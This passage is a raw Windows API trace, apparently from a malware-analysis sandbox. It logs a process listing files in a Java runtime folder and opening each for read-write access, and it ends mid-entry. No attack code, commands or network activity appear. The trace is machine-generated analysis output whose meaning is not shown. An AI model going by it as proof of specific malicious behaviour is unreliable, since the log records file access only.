[0093.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.993] AreFileApisANSI () returned 1 [0093.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0093.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x46518, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 52 [0093.993] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.993] GetFileType (hFile=0x360) returned 0x1 [0093.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0093.993] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.994] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.994] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.994] CloseHandle (hObject=0x360) returned 1 [0093.995] AreFileApisANSI () returned 1 [0093.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0093.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x45e18, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 52 [0093.995] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.995] GetFileType (hFile=0x360) returned 0x1 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0093.995] CloseHandle (hObject=0x360) returned 1 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.996] AreFileApisANSI () returned 1 [0093.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0093.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 52 [0093.996] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11240)) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0093.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.996] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21240, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sunec.dll", cAlternateFileName="")) returned 1 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.997] AreFileApisANSI () returned 1 [0093.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll", lpUsedDefaultChar=0x0) returned 49 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0093.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0093.998] AreFileApisANSI () returned 1 [0093.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0093.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46358 [0093.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 49 [0093.998] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.998] GetFileType (hFile=0x360) returned 0x1 [0093.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0093.999] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.999] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.999] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.999] CloseHandle (hObject=0x360) returned 1 [0093.999] AreFileApisANSI () returned 1 [0093.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0093.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46278 [0093.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 49 [0093.999] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.000] GetFileType (hFile=0x360) returned 0x1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0094.000] CloseHandle (hObject=0x360) returned 1 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.001] AreFileApisANSI () returned 1 [0094.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46198 [0094.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46198, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 49 [0094.001] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21240)) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.001] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7c40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sunmscapi.dll", cAlternateFileName="SUNMSC~1.DLL")) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0094.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0094.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0094.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0094.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0094.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0094.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0094.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0094.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.002] AreFileApisANSI () returned 1 [0094.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, 